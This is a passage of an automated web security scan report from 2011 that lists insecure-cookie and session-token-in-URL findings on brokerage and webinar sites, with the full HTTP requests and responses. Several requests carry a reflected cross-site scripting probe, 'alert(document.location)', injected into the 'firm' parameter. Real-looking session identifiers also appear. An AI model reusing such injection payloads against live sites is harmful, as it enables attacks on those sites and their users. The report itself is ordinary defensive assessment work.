Set-Cookie: TLTSID=0CC03F0C431889309D8520BC90B6D7F4; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*
* jQuery JavaScript Library v1.3.2
*
* Copyright (c) 2009 John Resig, http://jquery.com/
*
* Permission is hereby granted, free of charge, to any person obtaining
* a copy of this softw
...[SNIP]...

6.42. https://account.optionsxpress.com/inc/newaccount/jquery.autotab.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/jquery.autotab.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/newaccount/jquery.autotab.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 3628
Content-Type: application/x-javascript
Last-Modified: Mon, 10 May 2010 20:53:00 GMT
Accept-Ranges: bytes
ETag: "602a83c682f0ca1:fd0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=BFE98F2847714286306A699E393BF382; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=BFE98F2847714286306A699E393BF382; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*
* jQuery AutoTab plugin
* http://dev.lousyllama.com/auto-tab
*
* Copyright (c) 2007 Matthew Miller
* Licensed under the MIT License:
* http://www.opensource.org/licenses/mit-license.
...[SNIP]...

6.43. https://account.optionsxpress.com/inc/newaccount/jquery.scrollTo-min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/jquery.scrollTo-min.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/newaccount/jquery.scrollTo-min.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 2262
Content-Type: application/x-javascript
Last-Modified: Fri, 30 Apr 2010 20:54:50 GMT
Accept-Ranges: bytes
ETag: "f043f15fa7e8ca1:e6d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=CAA6523C4506CCBF77FDA49C4F49A484; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=CAA6523C4506CCBF77FDA49C4F49A484; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/**
* jQuery.ScrollTo - Easy element scrolling using jQuery.
* Copyright (c) 2007-2009 Ariel Flesler - aflesler(at)gmail(dot)com | http://flesler.blogspot.com
* Dual licensed under MIT and GPL.
...[SNIP]...

6.44. https://account.optionsxpress.com/inc/newaccount/styles.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/styles.css

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/newaccount/styles.css HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 13213
Content-Type: text/css
Last-Modified: Tue, 23 Nov 2010 16:59:49 GMT
Accept-Ranges: bytes
ETag: "f74a6d62f8bcb1:fb1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=392D4AC8455569B192DA4CA32E2368FD; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=392D4AC8455569B192DA4CA32E2368FD; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*    
   Purpose:    Styles for the new account process. Shared for all sites.
   Created by: Shawn Roser
   Date:        2/9/2005
*/

/* Style Redefinitions */

/*body { background: #EBEBEB; text-align: ce
...[SNIP]...

6.45. https://account.optionsxpress.com/inc/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/s_code.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/s_code.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 40455
Content-Type: application/x-javascript
Last-Modified: Tue, 07 Jun 2011 15:21:04 GMT
Accept-Ranges: bytes
ETag: "0b0f8832625cc1:eba"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=6A9CD6494BF18A25AD37E2AC6CC8ACAC; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=6A9CD6494BF18A25AD37E2AC6CC8ACAC; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/* global JS methods */
Array.prototype.indexOf = function (obj) {
   for (var i = 0; i < this.length; i++) {
       if (this[i] == obj) return i;
   }
   return -1;
}
Array.prototype.has = function (obj)
...[SNIP]...

6.46. https://adwords.google.com/um/StartNewLogin

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /um/StartNewLogin

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /um/StartNewLogin HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: SAG=EXPIRED;Path=/;Expires=Mon, 01-Jan-1990 00:00:00 GMT
Location: https://www.google.com/accounts/ServiceLogin?service=adwords&hl=en&ltmpl=adwords&passive=true&ifr=false&alwf=true&continue=https://adwords.google.com/um/gaiaauth?apt%3DNone
X-Invoke-Duration: 11
Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Sep 2011 19:45:19 GMT
Expires: Thu, 08 Sep 2011 19:45:19 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="https://www.google.com/accounts/ServiceLogin?s
...[SNIP]...

6.47. https://icewebinar.webex.com/icewebinar/lsr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://icewebinar.webex.com
Path:   /icewebinar/lsr.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icewebinar/lsr.php HTTP/1.1
Host: icewebinar.webex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:45:21 GMT
Server: Apache
Set-Cookie: galaxye_wl=R2995082818; path=/
Cache-Control: no-cache
Pragma: No-cache
Content-Length: 771
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.4 JSP/2.0
Connection: close
Content-Type: text/html


<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="6">
<base href="https://icewebinar.webex.com/mw0306ld/mywebex/jsp/com
...[SNIP]...

6.48. https://interactivebrokers.webex.com/interactivebrokers/lsr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://interactivebrokers.webex.com
Path:   /interactivebrokers/lsr.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /interactivebrokers/lsr.php HTTP/1.1
Host: interactivebrokers.webex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:47:08 GMT
Server: Apache
Pragma: No-cache
Content-Length: 797
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Cache-Control: no-cache
Set-Cookie: NSC_kkkbwxm=0afc54500899;path=/
Connection: close
Content-Type: text/html


<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="5">
<base href="https://interactivebrokers.webex.com/mw0306lb/mywebex
...[SNIP]...

6.49. https://interactivebrokers.webex.com/interactivebrokers/onstage/g.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://interactivebrokers.webex.com
Path:   /interactivebrokers/onstage/g.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /interactivebrokers/onstage/g.php HTTP/1.1
Host: interactivebrokers.webex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 08 Sep 2011 19:47:08 GMT
Server: Apache
Pragma: No-cache
Location: https://interactivebrokers.webex.com/mw0306lb/mywebex/default.do?nomenu=true&siteurl=interactivebrokers&service=6&main_url=https%3A%2F%2Finteractivebrokers.webex.com%2Fec0605lb%2Feventcenter%2Fevent%2FeventAction.do%3FtheAction%3Ddetail%26confViewID%3D-1%26siteurl%3Dinteractivebrokers%26%26%26
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Cache-Control: no-cache
Set-Cookie: NSC_kkkbwxm=0afc54500899;path=/
Connection: close
Content-Type: text/html
Content-Length: 935

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://interactivebrokers.webex.c
...[SNIP]...

6.50. https://www.cqgtrader.com/Languages/USEng/main.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cqgtrader.com
Path:   /Languages/USEng/main.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Languages/USEng/main.asp HTTP/1.1
Host: www.cqgtrader.com
Connection: keep-alive
Referer: http://www.efutures.com/services/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PrivateLabel=WebSite=CQG+Web+Trader&CustPhone=720%2D904%2D2980; ClientState=TraderID=&PrvLbl=cqg&IsLoggedOn=False&SQLSID=&StyleSheet=%2FLanguages%2FUSEng%2FPrvLbl%2Fcqg%2Fstylesheet%2Ecss&EP=cqg&Language=USEng&attempt=0&Disconnected=False&OSLastUpdate=0&LoggedOn=False&OSDeletionOccured=0&LocalAccounts=False

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:38:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON DSP CURa ADMa DEVa OUR IND CNT PRE"
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Content-Length: 1235
Content-Type: text/html
Expires: Thu, 08 Sep 2011 19:37:24 GMT
Set-Cookie: ClientState=TraderID=&PrvLbl=cqg&IsLoggedOn=False&SQLSID=&StyleSheet=%2FLanguages%2FUSEng%2FPrvLbl%2Fcqg%2Fstylesheet%2Ecss&EP=cqg&Language=USEng&attempt=0&Disconnected=False&OSLastUpdate=0&LoggedOn=False&OSDeletionOccured=0&LocalAccounts=False; path=/
Cache-control: private, no-cache


<HTML>
<HEAD>
<META HTTP-EQUIV="content-type" CONTENT="text/html; charset=utf-8">
<TITLE>CQG Web Trader</TITLE>
<SCRIPT>
   if (navigator.appName != "Microsoft Internet Explorer")
   {
       document
...[SNIP]...

6.51. https://www.optionsxpress.com/downloads/financial_services_guide.pdf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.optionsxpress.com
Path:   /downloads/financial_services_guide.pdf

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /downloads/financial_services_guide.pdf HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 18626
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: TLTHID=D480F472402E51465C012E9BFA1894F1; Path=/; Domain=.optionsxpress.com
HostName: DAWEB29
Set-Cookie: TLTCNT=DAWEB290000000000191854
Date: Thu, 08 Sep 2011 19:47:35 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title value="WC@FIRMNAME">optionsXpress | We're sorry but that request canno
...[SNIP]...

6.52. https://www.optionsxpress.com/login.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.optionsxpress.com
Path:   /login.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.asp HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 164
Content-Type: text/html
Expires: Thu, 08 Sep 2011 19:45:54 GMT
Location: https://www.optionsxpress.com/login.asp?r=1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=1B1DD000453D0D2ED80148A6B79D7F5A; Path=/; Domain=.optionsxpress.com
HostName: DAWEB23
Set-Cookie: TLTCNT=DAWEB230000000000085881
Date: Thu, 08 Sep 2011 19:46:54 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://www.optionsxpress.com/login.asp?r=1">here</a>.</body>

6.53. https://www.pfgboss.com/Default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pfgboss.com
Path:   /Default.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Default.aspx HTTP/1.1
Host: www.pfgboss.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Sep 2011 19:47:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Snapsis-PageBlaster: v:2.2.4;c:m;x:+;r:+
Set-Cookie: DotNetNukeAnonymous=ccf6be08-57ee-40a8-b475-8d38a127586f; expires=Thu, 08-Sep-2011 20:07:44 GMT; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 18118

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en-US">
<head id="Head"><meta id="MetaCopyright" name="COPYRIGHT" content="Copyright 2010 by PFGBEST" /><meta id="MetaAuth
...[SNIP]...

6.54. https://www.secureclient5.ranweb.com/login/ranweb.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.secureclient5.ranweb.com
Path:   /login/ranweb.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login/ranweb.asp?ConfigSelect=5003&run=5003&ranApplication=RANorder&applayoutid=517&DANactionid=661&O_IL=true&O_VR=3 HTTP/1.1
Host: www.secureclient5.ranweb.com
Connection: keep-alive
Referer: https://www.secureclient5.ranweb.com/login/login.asp?firm=eft
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rancookietest=rantestvalue

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:38:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: ran=%7B84DFE788%2DCFC2%2D4B74%2DA728%2D228B54CE7B57%7D; path=/login
Cache-control: private
Content-Length: 2199

<body><script language='javascript' src='Inquiry.js'></script><script language='javascript' src='KeySupport.js'></script><form name='RANform' method='post' action='ranWeb.asp'><input type='hidden' val
...[SNIP]...

7. Session token in URL
There are 5 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


7.1. https://account.optionsxpress.com/inc/interface.js

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://account.optionsxpress.com
Path:   /inc/interface.js

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /inc/interface.js HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; TLTHID=758690FA4AB663400EE3B482D991146F

Response

HTTP/1.1 200 OK
Content-Length: 60338
Content-Type: application/x-javascript
Last-Modified: Tue, 03 Aug 2010 21:34:06 GMT
Accept-Ranges: bytes
ETag: "87faba995333cb1:fb1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=BA882906446E0B88F4957ABDDD9DED0C; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:20 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

// DM - 7/29/05 **** This file contains functions mainly used by designers (open windows, manipulate GUI elements, etc.)
// Ref this file only on pages that need one of these functions.

// Globa
...[SNIP]...
<div id="subdrop1" style="visibility:hidden;position:absolute;"><a href="/OXNetTools/Charts/charts.aspx?SESSIONID=' + s + '&SYMBOL=' + symbol + '&SnapJava=stream" target="'+fTarget+'">Streaming</a><a href="/oxnettools/charts/snapcharts.aspx?SESSIONID=' + s + '&SYMBOL=' + symbol + '&SnapJava=snap" class="last" target="'+fTarget+'">Basic</a></div>';
   links[2]='<a href="/OXNetTools/Charts/charts.aspx?SESSIONID=' + s + '&SYMBOL=' + symbol + '&SnapJava=stream" target="'+fTarget+'">Streaming</a>';    
   links[3]='<a href="/oxnettools/charts/snapcharts.aspx?SESSIONID=' + s + '&SYMBOL=' + symbol + '&SnapJava=snap" target="'+fTarget+'">Basic</a>
...[SNIP]...
</a>';
   links[10]='<a href="/OXNetAccnt/welcome/risks/margin_guidelines.aspx?SESSIONID=' + s + '&ticker=' + symbol + '" target="'+fTarget+'">Margin</a>
...[SNIP]...
<div id="subdrop1" style="visibility:hidden;position:absolute;"><a href="/OXNetTools/Charts/charts.aspx?SESSIONID=' + s + '&SYMBOL=' + symbol + '&SnapJava=stream">Streaming</a><a href="/oxnettools/charts/snapcharts.aspx?SESSIONID=' + s + '&SYMBOL=' + symbol + '&SnapJava=snap" class="last">Basic</a></div>';
   links[20]='<a href="/OXNetTools/Charts/charts.aspx?SESSIONID=' + s + '&SYMBOL=' + symbol + '&SnapJava=stream">Streaming</a>';
   links[21]='<a href="/oxnettools/charts/snapcharts.aspx.asp?SESSIONID=' + s + '&SYMBOL=' + symbol + '&SnapJava=snap">Basic</a>
...[SNIP]...
</a>';
   links[23]='<a href="/OXNetAccnt/welcome/risks/margin_guidelines.aspx?SESSIONID=' + s + '&ticker=' + symbol + '">Margin</a>
...[SNIP]...
<div id="quoteFrameMoreMenu">'+links[8];
           //rowName[1]=links[38];
           rowName[1]='<a href="/OXNetTools/Charts/charts.aspx?SESSIONID=' + s + '&SYMBOL=' + symbol + '&SnapJava=stream" target="'+fTarget+'">Streaming Charts</a>
...[SNIP]...

7.2. https://cwt1.interactivebrokers.com/MT3G/servlet/LoginS

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://cwt1.interactivebrokers.com
Path:   /MT3G/servlet/LoginS

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

POST /MT3G/servlet/LoginS;jsessionid=758F62D39C87C4B1FF77534538503C91.cwt2?factor=338946663 HTTP/1.1
Host: cwt1.interactivebrokers.com
Connection: keep-alive
Referer: https://cwt1.interactivebrokers.com/MT3G/servlet/LoginS
Content-Length: 26
Cache-Control: max-age=0
Origin: https://cwt1.interactivebrokers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=758F62D39C87C4B1FF77534538503C91.cwt2; ib=googlead; web=1059282; XYZAB_AM.LOGIN=; XYZAB=; URL_PARAM=actiongetProps=getProps&language=en&propFile=SSO_Login_v1

user_name=xss&password=xss

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 20:08:33 GMT
Server: apache
Set-Cookie: JSESSIONID=8846F36EE6A06B019614B0FEA9754790.cwt2; Path=/MT3G; Secure; HTTPOnly
Content-Length: 1010
Connection: close
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="../include/MT3G.css" />
<meta http-equiv="Cache-Control" content="max-age=0" />
<title>Inte
...[SNIP]...

7.3. http://optionsxpress.tt.omtrdc.net/m2/optionsxpress/mbox/standard

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://optionsxpress.tt.omtrdc.net
Path:   /m2/optionsxpress/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string (the mboxSession parameter):

Request

GET /m2/optionsxpress/mbox/standard?mboxHost=www.optionsxpress.com&mboxSession=1315527919598-875378&mboxPage=1315527919598-875378&screenHeight=1200&screenWidth=1920&browserWidth=1266&browserHeight=984&browserTimeOffset=-300&colorDepth=16&mboxCount=1&mbox=ox_lp_options_global&mboxId=0&mboxTime=1315509919623&mboxURL=http%3A%2F%2Fwww.optionsxpress.com%2Fpromos%2Fexperience_an_options_specialist.aspx%3Fintcmp%3Dlp_sales_futures%26cmpid%3Dgsus23305007%26ef_id%3DzqROZUBXyFQAAIdR%3A20110908192437%3As&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dfutures%2Btrading&mboxVersion=39 HTTP/1.1
Host: optionsxpress.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 15627
Date: Thu, 08 Sep 2011 19:24:42 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('ox_lp_options_global',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-def
...[SNIP]...

7.4. https://www.interactivebrokers.com/Universal/servlet/AccountAccess.Logout

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.interactivebrokers.com
Path:   /Universal/servlet/AccountAccess.Logout

Issue detail

The URL in the request carries a session token: the jsessionid path parameter (servlet URL rewriting, so the token travels in the request line rather than in a cookie):

Request

GET /Universal/servlet/AccountAccess.Logout;jsessionid=54D71E83ABB03FD58EA41BA2BB7B8355.www3 HTTP/1.1
Host: www.interactivebrokers.com
Accept: */*
Accept-Language: en
